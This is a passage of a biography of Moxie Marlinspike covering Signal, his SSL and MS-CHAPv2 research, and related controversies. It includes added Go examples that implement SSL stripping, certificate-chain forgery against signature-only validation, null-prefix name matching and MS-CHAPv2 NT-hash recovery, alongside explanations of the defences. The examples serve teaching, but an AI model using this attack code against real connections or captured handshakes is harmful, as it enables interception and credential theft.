Marlinspike is a former head of the security team at Twitter[7] and the author of Convergence, a proposed replacement for the certificate-authority system that authenticates SSL servers.[8] He previously maintained a cloud-based WPA cracking service[9] and a targeted anonymity service called GoogleSharing.[10]
Career
Marlinspike began his career working for several technology companies, including the enterprise infrastructure software maker BEA Systems Inc.[3][11]
In 2010, Marlinspike was the chief technology officer and co-founder of Whisper Systems,[12] an enterprise mobile security startup. In May 2010, Whisper Systems launched TextSecure and RedPhone, applications that provided end-to-end encrypted SMS messaging and voice calling, respectively. Twitter acquired the company for an undisclosed amount in late 2011.[13] The acquisition was done "primarily so that Mr. Marlinspike could help the then-startup improve its security".[11] During his time as Twitter's head of cybersecurity,[14] the firm released Whisper Systems' apps as open source.[15][16]
Marlinspike left Twitter in early 2013 and founded Open Whisper Systems as a collaborative open source project for the continued development of TextSecure and RedPhone.[17][18][19] At the time, Marlinspike and Trevor Perrin started developing the Signal Protocol, an early version of which was first introduced in the TextSecure app in February 2014.[20] In November 2015, Open Whisper Systems unified the TextSecure and RedPhone applications as Signal.[21] Between 2014 and 2016, Marlinspike worked with WhatsApp, Facebook, and Google to integrate the Signal Protocol into their messaging services.[22][23][24]
On February 21, 2018, Marlinspike and WhatsApp co-founder Brian Acton announced the formation of the Signal Technology Foundation and its subsidiary, Signal Messenger LLC.[25][1] Marlinspike served as Signal Messenger's first CEO until stepping down on January 10, 2022.[26]
Research
SSL stripping
In a 2009 paper, Marlinspike introduced the concept of SSL stripping, a man-in-the-middle attack in which a network attacker prevents a web browser from ever upgrading to an SSL connection: the attacker relays the user's plaintext HTTP session, rewrites the https:// links and redirects in the pages it passes back, and holds the real SSL connection to the server itself. Because the browser never attempts an SSL connection, no certificate warning is shown, so the downgrade would likely go unnoticed by the user. He also released a tool, sslstrip, that performs these attacks automatically.[27][28] The HTTP Strict Transport Security (HSTS) specification was subsequently developed to combat these attacks: a site that has once been reached over SSL tells the browser to refuse plaintext connections to it for a set period, so a later downgrade attempt fails before any request is sent.[29]
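How the two halves of the attack and the defence fit together, as an added Go example written for this article (it is not code from sslstrip or from any browser). The page body, the redirect target and the host names bank.example and other.example are constructed for the example; the header syntax is the one defined in RFC 6797:

```go
package main

import (
	"fmt"
	"strconv"
	"strings"
)

// stripHTTPSLinks is the rewrite a stripping proxy applies to every page it
// relays over plaintext HTTP: each https:// link becomes an http:// link, so
// the browser never asks for a secure connection. The proxy keeps its own
// SSL session to the real server and forwards the traffic.
func stripHTTPSLinks(body string) string {
	return strings.ReplaceAll(body, "https://", "http://")
}

// downgradeRedirect does the same for a Location header, which is where most
// sites first tried to move a user onto SSL.
func downgradeRedirect(location string) string {
	if strings.HasPrefix(location, "https://") {
		return "http://" + strings.TrimPrefix(location, "https://")
	}
	return location
}

// HSTSPolicy is what a client remembers after receiving a
// Strict-Transport-Security header over a genuine SSL connection.
type HSTSPolicy struct {
	MaxAge            int
	IncludeSubDomains bool
}

// parseHSTS parses the RFC 6797 header value, e.g.
// "max-age=31536000; includeSubDomains". ok is false when max-age is missing
// or malformed; the client must then ignore the header entirely.
func parseHSTS(header string) (p HSTSPolicy, ok bool) {
	for _, d := range strings.Split(header, ";") {
		name, value, _ := strings.Cut(strings.TrimSpace(d), "=")
		switch strings.ToLower(strings.TrimSpace(name)) {
		case "max-age":
			n, err := strconv.Atoi(strings.Trim(strings.TrimSpace(value), `"`))
			if err != nil || n < 0 {
				return HSTSPolicy{}, false
			}
			p.MaxAge, ok = n, true
		case "includesubdomains":
			p.IncludeSubDomains = true
		}
	}
	return p, ok
}

// mustUseTLS is the decision a client makes before emitting a plaintext
// request. If host or a parent domain has a remembered policy, the client
// rewrites the URL to https:// itself, and the http:// request the stripping
// proxy needs never appears on the network.
func mustUseTLS(cache map[string]HSTSPolicy, host string) bool {
	labels := strings.Split(host, ".")
	for i := range labels {
		p, found := cache[strings.Join(labels[i:], ".")]
		if !found || p.MaxAge == 0 {
			continue // max-age=0 tells the client to forget the policy
		}
		if i == 0 || p.IncludeSubDomains {
			return true
		}
	}
	return false
}

func main() {
	// Constructed sample traffic, not a capture.
	page := `<a href="https://bank.example/login">Log in</a>`
	fmt.Println(stripHTTPSLinks(page))
	fmt.Println(downgradeRedirect("https://bank.example/account"))

	cache := map[string]HSTSPolicy{}
	if p, ok := parseHSTS("max-age=31536000; includeSubDomains"); ok {
		cache["bank.example"] = p // learned on an earlier, untampered visit
	}
	fmt.Println(mustUseTLS(cache, "www.bank.example")) // true: upgraded before it leaves the client
	fmt.Println(mustUseTLS(cache, "other.example"))    // false: still strippable
}
```

The first two functions are the whole of the attack; nothing cryptographic is broken, the browser is simply never given a reason to start SSL. The last function is why HSTS works: the decision is taken from the client's own cache before any packet is sent, so the attacker has nothing to rewrite. It also shows the limit the page does not spell out: a host whose policy the client has never seen (or whose entry has expired) is still strippable on its first visit.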
SSL implementation attacks
Marlinspike has discovered a number of different vulnerabilities in popular SSL implementations. Notably, he published a 2002 paper on exploiting SSL/TLS implementations that did not verify the X.509 v3 "BasicConstraints" extension in public key certificate chains. That extension's cA flag is what distinguishes a certificate authority from an ordinary end-entity certificate; without the check, anyone with a valid CA-signed certificate for any domain name could use its private key to sign a certificate for any other domain, and the result would be accepted as a valid CA-signed certificate. The vulnerable SSL/TLS implementations included the Microsoft CryptoAPI, making Internet Explorer and all other Windows software that relied on SSL/TLS connections vulnerable to a man-in-the-middle attack. In 2011, the same vulnerability was discovered to have remained in the SSL/TLS implementation on Apple Inc.'s iOS.[30][31] Also notably, Marlinspike presented a 2009 paper in which he introduced the concept of a null-prefix attack on SSL certificates. He revealed that all major SSL implementations failed to properly verify the Common Name value of a certificate: the CN was compared as a NUL-terminated C string, so a certificate issued to an attacker for a name consisting of the target host, a null character and the attacker's own domain was accepted by clients as a certificate for the target host alone.[32][33]
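Both implementation bugs in one added Go example, written for this article rather than taken from Marlinspike's papers or from any affected product. The root CA, attacker.example and bank.example are constructed names, the certificates are generated at run time, and Go's own x509 verifier stands in for a correct client:

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"fmt"
	"math/big"
	"strings"
	"time"
)

// issue creates a certificate for cn, self-signed when parent is nil and
// otherwise signed by parentKey. isCA sets the BasicConstraints cA flag.
func issue(cn string, isCA bool, parent *x509.Certificate, parentKey *ecdsa.PrivateKey) (*x509.Certificate, *ecdsa.PrivateKey) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		panic(err)
	}
	serial, _ := rand.Int(rand.Reader, new(big.Int).Lsh(big.NewInt(1), 62))
	tmpl := &x509.Certificate{
		SerialNumber:          serial.Add(serial, big.NewInt(1)),
		Subject:               pkix.Name{CommonName: cn},
		NotBefore:             time.Now().Add(-time.Hour),
		NotAfter:              time.Now().Add(24 * time.Hour),
		BasicConstraintsValid: true,
		IsCA:                  isCA,
		KeyUsage:              x509.KeyUsageDigitalSignature,
		ExtKeyUsage:           []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth},
	}
	if isCA {
		tmpl.KeyUsage |= x509.KeyUsageCertSign
	} else {
		tmpl.DNSNames = []string{cn}
	}
	signer, signerKey := tmpl, key
	if parent != nil {
		signer, signerKey = parent, parentKey
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, signer, &key.PublicKey, signerKey)
	if err != nil {
		panic(err)
	}
	cert, err := x509.ParseCertificate(der)
	if err != nil {
		panic(err)
	}
	return cert, key
}

// signaturesOnly is the flawed 2002-era check: each certificate's signature is
// verified under the next certificate's public key, but nobody asks whether
// that next certificate carries cA=TRUE in BasicConstraints.
func signaturesOnly(chain []*x509.Certificate) error {
	for i := 0; i+1 < len(chain); i++ {
		child, parent := chain[i], chain[i+1]
		if err := parent.CheckSignature(child.SignatureAlgorithm, child.RawTBSCertificate, child.Signature); err != nil {
			return err
		}
	}
	return nil
}

// pathValidation is the correct check: Go's verifier refuses to treat any
// certificate without cA=TRUE as an issuer.
func pathValidation(leaf *x509.Certificate, intermediates []*x509.Certificate, root *x509.Certificate, host string) error {
	roots, inter := x509.NewCertPool(), x509.NewCertPool()
	roots.AddCert(root)
	for _, c := range intermediates {
		inter.AddCert(c)
	}
	_, err := leaf.Verify(x509.VerifyOptions{Roots: roots, Intermediates: inter, DNSName: host})
	return err
}

// runScenario builds root CA -> ordinary server certificate for attacker.example
// -> certificate for bank.example signed with that server certificate's key, and
// returns what each check says, plus the result for the honest leaf.
func runScenario() (sigOnlyErr, pathErr, honestErr error) {
	root, rootKey := issue("Example Root CA", true, nil, nil)
	attacker, attackerKey := issue("attacker.example", false, root, rootKey)
	forged, _ := issue("bank.example", false, attacker, attackerKey)
	chain := []*x509.Certificate{forged, attacker, root}
	sigOnlyErr = signaturesOnly(chain)
	pathErr = pathValidation(forged, chain[1:2], root, "bank.example")
	honestErr = pathValidation(attacker, nil, root, "attacker.example")
	return
}

// cStyleNameMatch reproduces the 2009 null-prefix bug: the CN is handled as a
// NUL-terminated C string, so everything after the first NUL is ignored.
func cStyleNameMatch(cn, host string) bool {
	if i := strings.IndexByte(cn, 0); i >= 0 {
		cn = cn[:i]
	}
	return cn == host
}

// lengthAwareNameMatch compares the whole length-delimited CN.
func lengthAwareNameMatch(cn, host string) bool { return cn == host }

func main() {
	sigOnly, path, honest := runScenario()
	fmt.Println("signatures only:", sigOnly) // <nil>: forged chain accepted
	fmt.Println("path validation:", path)    // error: leaf is not an authorized issuer
	fmt.Println("honest leaf:", honest)      // <nil>

	nullCN := "bank.example\x00.attacker.example" // a CA sees a host under attacker.example and issues it
	fmt.Println(cStyleNameMatch(nullCN, "bank.example"), lengthAwareNameMatch(nullCN, "bank.example")) // true false
}
```

CheckSignature verifies only the signature, which is exactly what the 2002 implementations did; Verify walks the chain and stops at the attacker's leaf because it is not a CA. In the null-prefix case the certificate is legitimately issued, since the CA validates ownership of attacker.example; the defect is entirely in the client's string comparison.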
In 2012, Marlinspike and David Hulton presented research showing that the security of a captured MS-CHAPv2 handshake reduces to that of a single DES key. The handshake response consists of three DES encryptions of the same 8-byte challenge hash under three keys cut from the user's 16-byte NT password hash: the third key holds only two unknown bytes and falls to a 2^16 search, and because the first two keys encrypt the same plaintext, one exhaustive pass over the 2^56 DES keyspace recovers both. Hulton built hardware capable of completing that remaining DES key search in less than 24 hours, and the two made the hardware available for anyone to use as an Internet service.[39]
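The reduction step by step, as an added Go example written for this article (not code from the talk or from the cracking service). The peer challenge, authenticator challenge, user name and NT hash are constructed values; a real NT hash is the MD4 of the UTF-16LE password, which is not computed here. The 2^16 search for the third key runs in full; the 2^56 sweep is the same loop, walked here over a narrow window around the constructed hash so the example finishes in milliseconds:

```go
package main

import (
	"bytes"
	"crypto/des"
	"crypto/sha1"
	"encoding/binary"
	"fmt"
)

// Constructed sample handshake. Everything except the NT hash is visible on
// the wire; the hash is chosen so that keys 1 and 2 are numerically close.
var (
	samplePeer   = bytes.Repeat([]byte{0x11}, 16)
	sampleAuth   = bytes.Repeat([]byte{0x22}, 16)
	sampleUser   = "alice"
	sampleNTHash = []byte{
		0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x7a, // DES key 1
		0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x7f, // DES key 2
		0x9c, 0x4d, // DES key 3: these two bytes plus five zero bytes of padding
	}
)

// challengeHash is RFC 2759 ChallengeHash(): the single 8-byte plaintext that
// all three DES keys encrypt.
func challengeHash(peer, auth []byte, user string) []byte {
	h := sha1.New()
	h.Write(peer)
	h.Write(auth)
	h.Write([]byte(user))
	return h.Sum(nil)[:8]
}

// expandKey turns 7 key bytes into the 8-byte form DES expects; the low bit
// of each output byte is a parity bit the cipher ignores.
func expandKey(k7 []byte) []byte {
	k8 := make([]byte, 8)
	k8[0] = k7[0] & 0xFE
	for i := 1; i < 7; i++ {
		k8[i] = k7[i-1]<<(8-i) | k7[i]>>i
	}
	k8[7] = k7[6] << 1
	return k8
}

func desEncrypt(k7, block []byte) []byte {
	c, err := des.NewCipher(expandKey(k7))
	if err != nil {
		panic(err)
	}
	out := make([]byte, 8)
	c.Encrypt(out, block)
	return out
}

// ntResponse is RFC 2759 ChallengeResponse(): pad the 16-byte NT hash with
// five zero bytes, cut the 21 bytes into three 7-byte DES keys, encrypt ch
// under each and concatenate the results.
func ntResponse(ntHash, ch []byte) []byte {
	z := make([]byte, 21)
	copy(z, ntHash)
	resp := make([]byte, 0, 24)
	for i := 0; i < 21; i += 7 {
		resp = append(resp, desEncrypt(z[i:i+7], ch)...)
	}
	return resp
}

// recoverThirdKey exploits the padding: only two bytes of key 3 are unknown,
// so at most 2^16 DES encryptions recover NT hash bytes 14 and 15.
func recoverThirdKey(ch, resp []byte) ([]byte, bool) {
	k := make([]byte, 7)
	for guess := 0; guess < 1<<16; guess++ {
		k[0], k[1] = byte(guess>>8), byte(guess)
		if bytes.Equal(desEncrypt(k, ch), resp[16:]) {
			return []byte{k[0], k[1]}, true
		}
	}
	return nil, false
}

// sweepKeyspace is the divide-and-conquer step. Keys 1 and 2 encrypt the same
// plaintext ch, so each candidate is encrypted once and compared with both
// target blocks: one DES key search recovers both keys. The real attack walks
// all 2^56 values; the caller chooses the range here.
func sweepKeyspace(ch, resp []byte, from, to uint64) (k1, k2 []byte) {
	var buf [8]byte
	for v := from; v < to && (k1 == nil || k2 == nil); v++ {
		binary.BigEndian.PutUint64(buf[:], v)
		k := append([]byte(nil), buf[1:]...) // low 56 bits as a 7-byte key
		out := desEncrypt(k, ch)
		if bytes.Equal(out, resp[:8]) {
			k1 = k
		}
		if bytes.Equal(out, resp[8:16]) {
			k2 = k
		}
	}
	return k1, k2
}

// runAttack builds the sample handshake, then recovers the NT hash from the
// challenge and response alone. The sweep window is the constructed hash's
// neighbourhood (an assumption made so the example runs quickly).
func runAttack() ([]byte, bool) {
	ch := challengeHash(samplePeer, sampleAuth, sampleUser)
	resp := ntResponse(sampleNTHash, ch)
	k3, ok := recoverThirdKey(ch, resp)
	if !ok {
		return nil, false
	}
	k1, k2 := sweepKeyspace(ch, resp, 0x11223344556670, 0x11223344556690)
	if k1 == nil || k2 == nil {
		return nil, false
	}
	hash := make([]byte, 0, 16)
	hash = append(append(append(hash, k1...), k2...), k3...)
	return hash, true
}

func main() {
	hash, ok := runAttack()
	fmt.Printf("recovered NT hash %x (ok=%v)\n", hash, ok)
}
```

The recovered value is the NT hash itself, not the password; for MS-CHAPv2 that is enough, because the hash is all the client ever proves knowledge of. Note also why the padding matters twice: it hands over two bytes almost for free, and it is what leaves exactly two full keys, both over the same plaintext, for the single sweep.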
Mobily surveillance controversy
In 2013, Marlinspike published emails on his blog that he claimed were from Saudi Arabian telecom service Mobily soliciting his help in surveilling their customers, including intercepting communications running through various applications. Marlinspike refused to help, making the emails public instead. Mobily denied the allegations. "We never communicate with hackers", the company said.[40]
Traveling
Marlinspike says that when flying within the United States he is unable to print his own boarding pass, is required to have airline ticketing agents make a phone call in order to issue one, and is subjected to secondary screening at TSA security checkpoints.[41]
While entering the U.S. on a flight from the Dominican Republic in 2010, Marlinspike was detained by federal agents for nearly five hours, all his electronic devices were confiscated, and at first agents claimed he would only get them back if he provided his passwords so they could decrypt the data. Marlinspike refused to do this, and the devices were eventually returned, though he noted that he could no longer trust them, saying, "They could have modified the hardware or installed new keyboard firmware."[42]
Recognition
In 2016, Fortune magazine named Marlinspike among its 40 under 40 for being the founder of Open Whisper Systems and "[encrypting] the communications of more than a billion people worldwide".[43] Wired also named him to its "Next List 2016" as one of "25 Geniuses Who Are Creating the Future of Business".[44]
In 2017, Marlinspike and Perrin were awarded the Levchin Prize for Real World Cryptography "for the development and wide deployment of the Signal protocol".[45][46]
Personal life
Originally from the state of Georgia,[3] Marlinspike moved to San Francisco in the late 1990s at age 18.[1][11] The name Moxie Marlinspike is an assumed name partly derived from a childhood nickname.[1][3]
Marlinspike is a sailing enthusiast and master mariner.[3][47] In 2004, he bought a derelict sailboat and, with three friends, refurbished it and sailed around the Bahamas while making a "video zine" about their journey called Hold Fast.[1][3][11] He is also an anarchist,[3] and several of his essays and speeches are published on the website The Anarchist Library, including "An Anarchist Critique of Democracy"[48] and "The Promise of Defeat".[49]
Powers, Shawn M.; Jablonski, Michael (February 2015). The Real Cyber War: The Political Economy of Internet Freedom. University of Illinois Press. p. 198. ISBN 978-0-252-09710-2. JSTOR 10.5406/j.ctt130jtjf.
Aniszczyk, Chris (December 20, 2011). "The Whispers Are True". The Twitter Developer Blog. Twitter. Archived from the original on October 24, 2014. Retrieved January 22, 2015.